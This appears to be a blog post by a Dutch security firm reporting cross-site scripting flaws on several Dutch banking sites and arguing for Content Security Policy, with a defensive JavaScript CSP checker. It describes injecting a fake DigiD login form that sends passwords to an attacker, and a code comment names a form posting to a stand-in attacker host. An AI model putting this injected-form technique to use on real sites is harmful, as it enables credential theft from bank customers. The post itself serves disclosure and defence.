Banking websites and XSS: it's time for CSP

DongIT once again finds vulnerabilities on banking websites: a follow-up to the 2015 research

In January 2015, DongIT showed that 10 Dutch banking websites were vulnerable to cross-site scripting (XSS) on their main domains. In August 2016, roughly a year and a half later, DongIT carried out a new security study.

Goal of the research: to find out whether the banks now deploy an additional defensive layer, Content Security Policy (CSP), to prevent a repeat.

Result of the research: new XSS vulnerabilities were again found on the main domains of ABN AMRO, Triodos and SNS Bank.

Download the full article here (Dutch only): Banking websites and XSS: time for CSP v1.0

Why are these findings important?

The impact of an XSS vulnerability is most severe on a bank's main domain (e.g. www.abnamro.nl) or on its online-banking domain, because visitors recognise these domains and banking transactions take place there. During the attack the web address in the address bar, including the padlock icon of the TLS certificate, remains unchanged. Because the domain looks trustworthy, a visitor can be tricked into believing they are logging in with their DigiD account (the Dutch government's authentication system), while the entered data is sent to the attacker in the background.

The following is an example of an XSS attack on the main domain of ABN AMRO. A form is injected into the page that cannot be distinguished from a genuine one, and it appears to be possible to log in with DigiD. Given the trusted reputation of www.abnamro.nl, most visitors will not be suspicious. The entered password is sent to the attacker in the background.
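To make the research question above concrete (would a CSP have stopped this?), the following checker is an added example, not DongIT's code and not anything taken from a bank's site. It parses a Content-Security-Policy header value and reports whether the policy would block an injected inline script and whether it restricts where an injected form may post. It goes one step beyond the article by also checking `form-action`: an injected DigiD login form such as the one described above can be a pure HTML injection, which `script-src` alone does not stop. All header values in the block are constructed for illustration.

```javascript
// Added example (not DongIT's tooling): a minimal Content-Security-Policy
// checker. Given a CSP header value, it reports whether the policy would
// stop (1) an injected inline <script> and (2) an injected <form> that
// posts credentials to an attacker-controlled host.

// Parse a CSP header into { directiveName: [sourceExpression, ...] }.
// Per the CSP spec, when a directive appears more than once the first
// occurrence wins and later ones are ignored. Source expressions are
// lowercased here only to simplify matching; real nonces are case-sensitive.
function parseCsp(header) {
  const policy = {};
  for (const rawDirective of header.split(";")) {
    const tokens = rawDirective.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!(name in policy)) policy[name] = tokens.slice(1).map((t) => t.toLowerCase());
  }
  return policy;
}

// A nonce or hash source; its presence makes browsers ignore 'unsafe-inline'.
const isNonceOrHash = (src) => /^'(nonce-|sha(256|384|512)-)/.test(src);

// A source expression that effectively allows any attacker-chosen host.
const isOverlyBroad = (src) => src === "*" || /^(https?|data|blob):$/.test(src);

function assessCsp(header) {
  const policy = parseCsp(header);
  const findings = [];

  // script-src governs <script>; it falls back to default-src; with neither,
  // script execution is completely unrestricted.
  const scriptSrc = policy["script-src"] ?? policy["default-src"] ?? null;
  let blocksInlineScript = true;
  if (scriptSrc === null) {
    blocksInlineScript = false;
    findings.push("no script-src or default-src: script execution is unrestricted");
  } else {
    if (scriptSrc.includes("'unsafe-inline'") && !scriptSrc.some(isNonceOrHash)) {
      blocksInlineScript = false;
      findings.push("'unsafe-inline' without a nonce or hash: an injected inline <script> runs");
    }
    if (scriptSrc.includes("'unsafe-eval'")) {
      findings.push("'unsafe-eval': eval()/new Function() on injected strings is allowed");
    }
    // With 'strict-dynamic' the host allowlist is ignored, so broad hosts do not matter there.
    if (!scriptSrc.includes("'strict-dynamic'")) {
      for (const src of scriptSrc.filter(isOverlyBroad)) {
        findings.push(`script source ${src} lets an attacker load a script from a host they control`);
      }
    }
  }

  // form-action has NO fallback to default-src. Without it, an injected
  // <form action="https://attacker.example/"> (pure HTML, no script) posts freely.
  const formAction = policy["form-action"] ?? null;
  const restrictsFormAction = formAction !== null && !formAction.some(isOverlyBroad);
  if (!restrictsFormAction) {
    findings.push("form-action missing or overly broad: an injected login form can post credentials to any host");
  }

  return { blocksInlineScript, restrictsFormAction, findings };
}

// Constructed sample header values; they are not taken from any bank's site.
// The nonce in STRICT_CSP is a fixed placeholder: a real deployment must
// generate a fresh, unpredictable nonce for every response.
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https:";
const STRICT_CSP =
  "default-src 'self'; script-src 'nonce-r4nd0mV4lu3' 'strict-dynamic'; " +
  "object-src 'none'; base-uri 'self'; form-action 'self'";

for (const [label, csp] of [["weak", WEAK_CSP], ["strict", STRICT_CSP]]) {
  const result = assessCsp(csp);
  console.log(`${label}: blocksInlineScript=${result.blocksInlineScript} restrictsFormAction=${result.restrictsFormAction}`);
  for (const finding of result.findings) console.log(`  - ${finding}`);
}
```

Run it with `node` and feed it the `Content-Security-Policy` value from a site's response headers. The weak policy is typical of a first CSP deployment: `'unsafe-inline'` is added to keep legacy inline scripts working, which leaves exactly the injected-script case open, and `https:` lets an attacker load a script from any host they control. The strict policy relies on per-response nonces plus `'strict-dynamic'` and adds `form-action 'self'` against the injected-form case. CSP is a second line of defence: it limits what an injection can do, but does not replace output encoding of user-controlled data.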

Another example is the following simple but striking manipulation of the page, which shows that the attacker has complete control over the banking website as rendered in the visitor's browser.

The video from the previous research (2015) is shown below. It shows 10 banking websites doing the "Harlem Shake" on their root domains.